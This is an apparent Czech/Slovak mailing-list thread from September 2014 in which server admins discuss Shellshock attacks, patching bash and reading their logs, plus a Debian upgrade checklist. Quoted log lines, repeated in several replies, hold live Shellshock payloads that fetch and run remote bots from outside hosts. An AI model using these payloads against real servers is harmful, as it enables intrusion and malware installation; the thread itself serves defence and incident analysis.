mysql: http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html http://dev.mysql.com/doc/refman/5.5/en/upgrading-from-previous-series.html mysqldump -u root -p --all-databases > backup.sql mysql -u root -p < backup.sql
- apt-get remove --purge dovecot-common
- apt-get update & upgrade & dist-upgrade of current distribution
- dpgk --audit
- mysql dump
- edit sources.list squeeze -> wheezy
- apt-get update & upgrade & dist-upgrade (keep current configs)
- NOW - problem with mysql, replace old my.cnf with new my.cnf.dpkg-dist
- apt-get autoremove
- dpkg --audit , aptitude reinstall ****** all the packages listed in dpkg --audit
- create /etc/my.cnf with:
[mysqld] open_files_limit = 100000
- mysql from dump (recommended by mysql)
- apt-get install dovecot-common dovecot-imapd dovecot-pop3d
On 29 Sep 2014, at 23:20, Michal Dobsovic <dobsovic@itlearning.sk mailto:dobsovic@itlearning.sk> wrote:
Chystam sa robit dist upgrade z wheezy na squeeze. Ma s tym niekto prakticke skusenosti? Viem, ze je to 50:50 - bud to pojde, alebo nie, ale ak mate niekto prakticku skusenost a riesili ste aj nejaky problem, urcite pomozete :)
Dik. Miso
Dňa pondelok, 29. septembra 2014 Jiří Čermák <jirka.cer@gmail.com mailto:jirka.cer@gmail.com> napísal(a): Byl jsem na tom podobně. Pořád jsem zkoušel aktualizovat a nic. Pak jsem zjistil, že jsem neměl přidaný LTS repozitář. :)
Dne 29. září 2014 14:16 Juraj Chlebec <havran@gmail.com javascript:_e(%7B%7D,'cvml','havran@gmail.com');> napsal(a): Tiez dakujem - som dohladal ako do Squeeze pridat LTS repozitare a uz je vsetko ok.
Juro Chlebec
2014-09-29 13:57 GMT+02:00 Nikos Timiopulos <nikos@manikstudio.cz javascript:_e(%7B%7D,'cvml','nikos@manikstudio.cz');>: Ahoj,
za toto díky! Připomnělo mi to vpsku kde je debian squeeze ale bez LTS repozitárů, které záplatu obsahují. Pro podobné zapomnětlíky: https://wiki.debian.org/LTS/Using https://wiki.debian.org/LTS/Using
Nikos
On 29 Sep 2014, at 13:35, Petr Krcmar <petr.krcmar@vpsfree.cz javascript:_e(%7B%7D,'cvml','petr.krcmar@vpsfree.cz');> wrote:
Dne 29.9.2014 v 10:34 Petr Krcmar napsal(a):
V tuhle chvíli děláme na tom, abychom zjistili, které VPS jsou ještě napadnutelné. Za chvíli obejdeme všechny nainstalované bashe a zkusíme na nich upravenou proměnnou. Upozorníme uživatele, kteří ještě nemají záplatu (a zveřejním nějakou statistiku).
Hotovo, nezáplatovaných bylo 382 VPS, tedy více než půlka (57 %). Majitelům šly maily s upozorněním. Díky Tomsovi za pomoc.
-- Petr Krčmář vpsFree.cz _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list http://lists.vpsfree.cz/listinfo/community-list
-- Juraj Chlebec aka Havran http://www.svoji.sk http://www.svoji.sk/
Community-list mailing list Community-list@lists.vpsfree.cz javascript:_e(%7B%7D,'cvml','Community-list@lists.vpsfree.cz'); http://lists.vpsfree.cz/listinfo/community-list http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz mailto:Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28 Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1) End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57 Install: php5-cli:amd64 (5.4.33-1~dotdeb.1) End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51 Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3) End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.
Dne 29.9.2014 v 10:37 "Jan B. Kolář" napsal(a):
Poradíte, co teď dál?
Nic. Pokud je bash záplatovaný, tak jsou to jen dotazy na konkrétní stránky, kterým se útočník snažil podvrhnout v requestu kód. Pravděpodobně to kvůli záplatovanému bashi selhalo, takže je to OK.
Ok, sorry za paniku. Pondělky jsou vždycky na houby ;-)
On 29.9.2014 10:40, Petr Krcmar wrote:
Dne 29.9.2014 v 10:37 "Jan B. Kolář" napsal(a):
Poradíte, co teď dál?
Nic. Pokud je bash záplatovaný, tak jsou to jen dotazy na konkrétní stránky, kterým se útočník snažil podvrhnout v requestu kód. Pravděpodobně to kvůli záplatovanému bashi selhalo, takže je to OK.
Osobne si myslim ze 200 odpovede nemusia nic znamenat. Ked si vsimnes, 404 to vratilo pri /test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale / ocividne mas :) a tam to vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je hlavne ak web bezi cez CGI, a co som sa o tom bavil so sysadminom jedneho zakaznika, tak pri FastCGI (bezne riesenie pri PHP pod nginx) SCGI a pod. vraj treba aby bash bol pouzity ako CGI jazyk, lebo FastCGI a pod. nepouzivju premenne prostredia na posuvanie informacii skriptu. A uprimne povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit bash ako skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial zrovna nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne obsah tych params spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28 Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1) End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57 Install: php5-cli:amd64 (5.4.33-1~dotdeb.1) End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51 Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3) End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Tymto ovsem nechcem podcenovat vaznost tej chyby a dolezitost updatu, len som chcel poukazat na to ze webserver zrovna nie je pri tejto chybe najzranitelnejsi. DHCP vidim ako daleko zranitelnejsi, prip. to, ze kvoli tejto chybe sa moze stat lahko zranitelnou nejaka nahodna aplikacia/utilita ktoru na masine mozete mat.
On 29 Sep 2014, at 11:42, Ján Raška raskaj@gmail.com wrote:
Osobne si myslim ze 200 odpovede nemusia nic znamenat. Ked si vsimnes, 404 to vratilo pri /test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale / ocividne mas :) a tam to vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je hlavne ak web bezi cez CGI, a co som sa o tom bavil so sysadminom jedneho zakaznika, tak pri FastCGI (bezne riesenie pri PHP pod nginx) SCGI a pod. vraj treba aby bash bol pouzity ako CGI jazyk, lebo FastCGI a pod. nepouzivju premenne prostredia na posuvanie informacii skriptu. A uprimne povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit bash ako skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial zrovna nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne obsah tych params spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28 Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1) End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57 Install: php5-cli:amd64 (5.4.33-1~dotdeb.1) End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51 Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3) End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Jinak ono zakernost tedle chyby je to, ze se ten bash nemusi pouzivat naprimo, ale staci, aby se z procesu, ktery ma nejakym zpusobem zmanipulovane env pustil system('cokoliv'), a to klidne i na urovni nejake ceckove knihovny, u ktere si to clovek "zvenku" neuvedomi.
U cisteho CGI je jednoducha cesta, jak zmanipulovat env, jelikoz se ruzne parametry o requestu predavaji prave v env, konkretne uplne nejjednodussi je asi user agent, kterej se typicky predava v $HTTP_USER_AGENT.
Vyhodou FastCGI a podobnych je to, ze amanipulovat env neni tak jednoduche, jelikoz info o jednotlivych requestech se predava jinak, konkretne u FastCGI socketem.
Takze opravdu v zasade ani 200, ani 404 nemusi nic znamenat :(
Zdar, Petr
On 9/29/14, Ján Raška raskaj@gmail.com wrote:
Osobne si myslim ze 200 odpovede nemusia nic znamenat. Ked si vsimnes, 404 to vratilo pri /test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale / ocividne mas :) a tam to vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je hlavne ak web bezi cez CGI, a co som sa o tom bavil so sysadminom jedneho zakaznika, tak pri FastCGI (bezne riesenie pri PHP pod nginx) SCGI a pod. vraj treba aby bash bol pouzity ako CGI jazyk, lebo FastCGI a pod. nepouzivju premenne prostredia na posuvanie informacii skriptu. A uprimne povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit bash ako skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial zrovna nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne obsah tych params spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28 Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1) End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57 Install: php5-cli:amd64 (5.4.33-1~dotdeb.1) End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51 Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3) End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Presne tak, neviem koho napadlo ze 404 znamena ze je vsetko v pohode, ved predsa HTTP status code indikuje nieco uplne ine nez to ci sa nastavili nejake env. vars, prip. ci sa spustali nejake externe prikazy. Moze sice indikovat neexistujuci skript (tam je ale potom otazne ci sa v takom pripade 404 vrati este pred nastavenim env. vars, v tom sa az tak nevyznam), ale predsa aj existujuci skript moze vratit 404, to je predsa uplne normalna vec ktoru skript vrati pri poziadavke na get/update/delete neexistujuceho obsahu.
On 29 Sep 2014, at 11:58, Petr Sykora petr.sykora@gmail.com wrote:
Jinak ono zakernost tedle chyby je to, ze se ten bash nemusi pouzivat naprimo, ale staci, aby se z procesu, ktery ma nejakym zpusobem zmanipulovane env pustil system('cokoliv'), a to klidne i na urovni nejake ceckove knihovny, u ktere si to clovek "zvenku" neuvedomi.
U cisteho CGI je jednoducha cesta, jak zmanipulovat env, jelikoz se ruzne parametry o requestu predavaji prave v env, konkretne uplne nejjednodussi je asi user agent, kterej se typicky predava v $HTTP_USER_AGENT.
Vyhodou FastCGI a podobnych je to, ze amanipulovat env neni tak jednoduche, jelikoz info o jednotlivych requestech se predava jinak, konkretne u FastCGI socketem.
Takze opravdu v zasade ani 200, ani 404 nemusi nic znamenat :(
Zdar, Petr
On 9/29/14, Ján Raška raskaj@gmail.com wrote:
Osobne si myslim ze 200 odpovede nemusia nic znamenat. Ked si vsimnes, 404 to vratilo pri /test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale / ocividne mas :) a tam to vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je hlavne ak web bezi cez CGI, a co som sa o tom bavil so sysadminom jedneho zakaznika, tak pri FastCGI (bezne riesenie pri PHP pod nginx) SCGI a pod. vraj treba aby bash bol pouzity ako CGI jazyk, lebo FastCGI a pod. nepouzivju premenne prostredia na posuvanie informacii skriptu. A uprimne povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit bash ako skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial zrovna nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne obsah tych params spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář janbivoj.kolar@zazen-nudu.cz wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28 Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1) End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57 Install: php5-cli:amd64 (5.4.33-1~dotdeb.1) End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51 Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3) End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář" napsal(a):
možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik byl úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam vidíš 404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál. Jestli byl útok úspěšný tam nevyčteš.
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
Ahoj,
tak ja mam v apache logu toto:
/var/log/httpd/access_log:173.45.100.18 - - [28/Sep/2014:23:42:22 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 295 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*""
Skript, na ktery to odkazuje se da stahnout a rika si "perlbot"...
Vojta
Dne 29. září 2014 9:57 Jiří Medvěd admin@jirimedved.cz napsal(a):
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Hele,
z jineho stroje:
/var/log/nginx/access.log-20140929.gz:70.42.149.67 - - [28/Sep/2014:08:16:18 +0200] "GET / HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu, podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iF4EAREIAAYFAlQpENIACgkQ5JdzTS3AJTa8fAEAh8VbArIz7ElgezKEI44Yz5E9 fSIKhd/2Z6T0ZSm3o+EA/0vaA7spDhwHRjGcOUtx81p+ScBcWvnM++8q3Iad3wPH =W15o -----END PGP SIGNATURE----- _______________________________________________ Community-list mailing list Community-list@lists.vpsfree.cz http://lists.vpsfree.cz/listinfo/community-list
ja som si nasiel (zatial len v ramci jedneho vhostu) asi 20 pokusov (rozne url hlavne zacinajuce cgi-): 62.210.75.170 - - [28/Sep/2014:20:12:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 3071 "() { :; }; wget http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/bG9zeXMuYml6U2hlbGxTaG9ja1NhbHQ= >> /dev/null" skusal som pre tu srandu stiahnut ten subor z creditstat.ru ze so do toho pozrem ale uz to hlasi E404
On 09/29/2014 09:41 AM, Petr Krcmar wrote:
Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném proudu, podle logu se mi včera někdo snažil do serveru nahrát rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
Pokud chcete vidět ty věci z logu, pak si grepněte:
# grep '() {' /var/log/nginx/*
Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
community-list@lists.vpsfree.cz
-
"Jan B. Kolář" -
Egon Eckert -
Jan Sedlák -
Jaroslav Skřivan -
Jirka Bourek -
Jiří Medvěd -
Jiří Čermák -
Juraj Chlebec -
Ján Raška -
Michal Dobsovic -
Michal Kovarcik -
Michal Miklos -
Miroslav Vadkerti -
Nikos Timiopulos -
Pavol Hluchý -
Petr Krcmar -
Petr Sykora -
Petr Tesařík -
Petr Vanek -
René Klačan -
Stanislav Petr -
Vojtěch Sigler